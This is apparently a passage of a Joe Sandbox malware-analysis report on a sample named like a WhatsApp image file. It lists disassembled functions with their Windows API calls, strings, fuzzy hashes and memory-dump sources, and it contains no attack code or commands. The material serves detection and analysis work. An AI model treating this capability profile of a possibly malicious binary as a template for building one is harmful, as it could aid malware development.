Instruction ID: c4d3eba28e20042d0c79c98c1b9379796ffb35976e80c465ad8656c9c9266248
Opcode Fuzzy Hash: ff59b2989521e4446c3732020680e86a2858ccab6f6d1490d8f092a39b8d5121
Instruction Fuzzy Hash: 11414CB1501705BFEB129F90DC89FEA7BACFF09354F004126FA469A281D7B0D9448BB5

Function 000DB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0011DC00), ref: 000DB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0011DC00), ref: 000DB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 000DB8C1
SysFreeString.OLEAUT32(?), ref: 000DB8EB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 72f18fdfef45b25ceb48fe847cd8ce81c885b3b042bd41476ac68a6e4d49131f
Instruction ID: 89ec9a787f9c1f3e965c06d248aec9f6176989ef0a0b928b2c3c64b496d03ad1
Opcode Fuzzy Hash: 72f18fdfef45b25ceb48fe847cd8ce81c885b3b042bd41476ac68a6e4d49131f
Instruction Fuzzy Hash: 9BF14C75A00209EFDF14DF94C884EAEB7B9FF49311F11845AF905AB251DB71AE41CB60

Function 000E24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000E2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000E26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000E26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000E270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000E286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 000E28A1
CloseHandle.KERNEL32(?), ref: 000E28D0
CloseHandle.KERNEL32(?), ref: 000E2947

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 58821aedb2b5181edfa770114517cdf15e1034593a89938e688d5407fc145054
Instruction ID: 172b776d2e2df541fade2c02837802dd2d897fb1d88b9d54a0f83e39466dfa4e
Opcode Fuzzy Hash: 58821aedb2b5181edfa770114517cdf15e1034593a89938e688d5407fc145054
Instruction Fuzzy Hash: BCD1BE31604341DFCB14EF25C991AAEBBE5BF85320F14856DF899AB2A2DB30DC40CB52

Function 000EB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000EB3F4

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 1ef151a6359c3dc68f3e3d800b6d75528dba8a77b83d3a70c8ae35a7ee78adf4
Instruction ID: a81318e75d2cca17abf24cd0a5a67709eb9637770cf8ecf48e7d093d85ad1e45
Opcode Fuzzy Hash: 1ef151a6359c3dc68f3e3d800b6d75528dba8a77b83d3a70c8ae35a7ee78adf4
Instruction Fuzzy Hash: 5451C571601284BFEF309F6ADC86BAF7BA4EB05364F244012F654F65E2C7B1E9809B50

Function 0009A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000FDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000FDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000FDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000FDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000FDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FDBC8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 2686e756b800986ee6e5a8a0d4ef1bd4dd669f9233c23a32b3ff340806c3b16b
Instruction ID: 5852e062df70c836c5e35a17cb2726c46620db4e31229e6f67c22942c5f6fcbe
Opcode Fuzzy Hash: 2686e756b800986ee6e5a8a0d4ef1bd4dd669f9233c23a32b3ff340806c3b16b
Instruction Fuzzy Hash: 9E517B70604208EFDF20DFA8DC82FAA77F5AB59750F110519F94696AA1D7B0ED80EB90

Function 000C7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1

Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC

lstrcmpiW.KERNEL32(?,?), ref: 000C75CA
_wcscmp.LIBCMT ref: 000C75E2
MoveFileW.KERNEL32(?,?), ref: 000C75FB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 5b7a99fd052030683f42f1b3c07d4efd13e8eb804fe0d246a3bfe4c7dd217cb4
Instruction ID: 4b5be11837187696354dba344cd999196662175c8ccbd583e4b7b9b47a39dc1b
Opcode Fuzzy Hash: 5b7a99fd052030683f42f1b3c07d4efd13e8eb804fe0d246a3bfe4c7dd217cb4
Instruction Fuzzy Hash: 585123B2A092199BDF65EB94D841EDD73BCAF09320F0041AEF609E3542EA7497C5CF64

Function 0009EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 0009EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 0009EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 000FDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 000FDCF2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: a7972ee54ee7c5bea41a2f4b245c9a5732fb2f0d99a25ce6acf8da7c61551a44
Instruction ID: c94a1d715044fc8eab349ce922bbaceeafb41f0ceb4b4919a7ff37d9e4226028
Opcode Fuzzy Hash: a7972ee54ee7c5bea41a2f4b245c9a5732fb2f0d99a25ce6acf8da7c61551a44
Instruction Fuzzy Hash: 5A41D4702092C5EADFB5CB28D98DA7F7AD7AB41305F19041AE28782D61C7B1BC80F611

Function 000BB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB26C
HeapAlloc.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000BAEF1,00000B00,?,?), ref: 000BB288
GetCurrentProcess.KERNEL32(?,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB290
DuplicateHandle.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,000BAEF1,00000B00,?,?), ref: 000BB2A3
GetCurrentProcess.KERNEL32(000BAEF1,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB2AB
DuplicateHandle.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB2AE
CreateThread.KERNEL32(00000000,00000000,000BB2D4,00000000,00000000,00000000), ref: 000BB2C8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 9d59d8a7ae5fcb6b2b5287428e66b84726663fd70f2149326325cdce0b148d82
Instruction ID: 330e3cf502b16dc2c96568f004d90693a5a9ded109a832038ae66970863fe09b
Opcode Fuzzy Hash: 9d59d8a7ae5fcb6b2b5287428e66b84726663fd70f2149326325cdce0b148d82
Instruction Fuzzy Hash: EA01CDB5240304BFE710AFA5EC4DF6B7BACEB88711F018411FA45DF6A1CAB49840CB61

Function 000DC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 000DC876, 000DC887
Not an Object type, xrefs: 000DC49E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 172dec122af141012226d4ce3109b2128d5f7a4b455f9972ba0d154f65aefd16
Instruction ID: ce3c0afcf14f52eb4e4d43786997c541eddbe7f64c1ce51a8bb46ad3fbea43f0
Opcode Fuzzy Hash: 172dec122af141012226d4ce3109b2128d5f7a4b455f9972ba0d154f65aefd16
Instruction Fuzzy Hash: 48E17E71A0031AABEF14DFA4D985EEE77F5EF48314F14806AE945AB381D770AD41CBA0

Function 000DBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000DBB5C
VariantInit.OLEAUT32(?), ref: 000DBC2D
VariantInit.OLEAUT32(?), ref: 000DBD2E
VariantClear.OLEAUT32(?), ref: 000DBD38
VariantClear.OLEAUT32(?), ref: 000DBD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 000DBD11
Null Object assignment in FOR..IN loop, xrefs: 000DBBBD, 000DBCEB, 000DBDA7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 92fead74ab9cf41970071fccab25836de68fbe1d266d9cd8a4183017c67e43d7
Instruction ID: 8d9312bfef0a84447ea537582109c8fe387e9feae7018fa4b4b80456064bc429
Opcode Fuzzy Hash: 92fead74ab9cf41970071fccab25836de68fbe1d266d9cd8a4183017c67e43d7
Instruction Fuzzy Hash: 8F918B71A00319EBDF24DFA5C848FAEBBB9EF85710F11855AF515AB281DB709940CFA0

Function 000E9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000E9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 000E9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000E9B47
_wcscat.LIBCMT ref: 000E9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 000E9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 000E9BE7

Strings

SysListView32, xrefs: 000E9AEB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: a6e4309991e989c1675da8ea01d0e5397326aa90d35b522eecf17e7d7d1bd4ec
Instruction ID: 1df7b5e2f31b265431ee9c8aa46613424d91460c2bef9b88c5870ac9f3983b06
Opcode Fuzzy Hash: a6e4309991e989c1675da8ea01d0e5397326aa90d35b522eecf17e7d7d1bd4ec
Instruction Fuzzy Hash: 81418F71940348AFDB219FA4DC85BEE77E8EF08350F10442AF589A7292D7B19D84CB60

Function 000E172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 000C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6554
Part of subcall function 000C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6564
Part of subcall function 000C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E179A
GetLastError.KERNEL32 ref: 000E17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 000E1855
GetLastError.KERNEL32(00000000), ref: 000E1860
CloseHandle.KERNEL32(00000000), ref: 000E1895

Strings

SeDebugPrivilege, xrefs: 000E17B8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 4127d0f8f097f14106c80215a9d01d5c145755475f06544bf9bf0e1c6e79b711
Instruction ID: 431ed0b11f3942bd59f837745b4bcc01b229b8081269ba7111f6e488df38d443
Opcode Fuzzy Hash: 4127d0f8f097f14106c80215a9d01d5c145755475f06544bf9bf0e1c6e79b711
Instruction Fuzzy Hash: 2341BC72600200AFDB19EF94C9A5FEEB7A1AF44710F04805CF906AF2C3DFB4A9418B91

Function 000C5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 000C58B8

Strings

question, xrefs: 000C5871
stop, xrefs: 000C5889
warning, xrefs: 000C58A1
blank, xrefs: 000C583A
info, xrefs: 000C5859

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: e7db4103854d5e6b243543bc40ec7c2da7ff0abb472f2a286b0b06c76740f1cd
Instruction ID: d436d7a7e306a673a03330f5c49896ebc662443beb749c23ef0f8a9a384519fb
Opcode Fuzzy Hash: e7db4103854d5e6b243543bc40ec7c2da7ff0abb472f2a286b0b06c76740f1cd
Instruction Fuzzy Hash: 7711EB79309B46BEE7115B949C82EAE23DC9F15364F20003EF554F56C2EBA0BA844268

Function 000CA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000CA806

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: a205067db28288f4795c8d4b339524ff8a578f63f8b13e57dd0e6f170c5a2129
Instruction ID: 3ac22e19b6b0584641bda025ff88b620286a285fdced49803f563134845b86d6
Opcode Fuzzy Hash: a205067db28288f4795c8d4b339524ff8a578f63f8b13e57dd0e6f170c5a2129
Instruction Fuzzy Hash: 37C16A75A0421A9FDB10CF98D485BEEB7F4FF0A319F20406DE606E7251D735AA41CBA2

Function 000C6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000C6B63
LoadStringW.USER32(00000000), ref: 000C6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000C6B80
LoadStringW.USER32(00000000), ref: 000C6B87
_wprintf.LIBCMT ref: 000C6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 000C6BA8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 5dd68de1bd534f153f6220952efb35facc5a57da457429b5de657adbd7c1efef
Instruction ID: 6bf6e79843775a680bd5f5248f4865637b04d680648787527865a2b68ceddafa
Opcode Fuzzy Hash: 5dd68de1bd534f153f6220952efb35facc5a57da457429b5de657adbd7c1efef
Instruction Fuzzy Hash: 270112F65002187FE711A7D4AD89EEA766CD704304F0044A5B785E2441EAB49EC48B75

Function 000E2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2BB5,?,?), ref: 000E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2BF6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: e8d94dd5dc25de682c304e7a9a2a3ac1e6bcaa3f4bb4a0c489ad529f7e98b6b7
Instruction ID: ee4db5a1e6b0e304b51daa89f1c22aa9d822f5771d1bb6f6d1bf2789969f4971
Opcode Fuzzy Hash: e8d94dd5dc25de682c304e7a9a2a3ac1e6bcaa3f4bb4a0c489ad529f7e98b6b7
Instruction Fuzzy Hash: 61919D71604240AFDB11EF55C891FAEB7E9FF88310F14881DF996A72A2DB70E945CB42

Function 000D961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 000D9691
WSAGetLastError.WSOCK32(00000000), ref: 000D969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 000D96C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000D96E9
WSAGetLastError.WSOCK32(00000000), ref: 000D96F8
inet_ntoa.WSOCK32(?), ref: 000D9765
htons.WSOCK32(?,?,?,00000000,?), ref: 000D97AA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: c56764ad9617599c46f801e841666a648e0d85a678b875c0ab32021b109a3d68
Instruction ID: a3565c47060c7a9268ceedc8b639c39c93f82f93f4b4c1db97b25c5b87b68289
Opcode Fuzzy Hash: c56764ad9617599c46f801e841666a648e0d85a678b875c0ab32021b109a3d68
Instruction Fuzzy Hash: 3A71BB31508340ABD710EF64DC85EAFB7E8EF85714F104A2EF5969B292EB70D904CB62

Function 000AA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

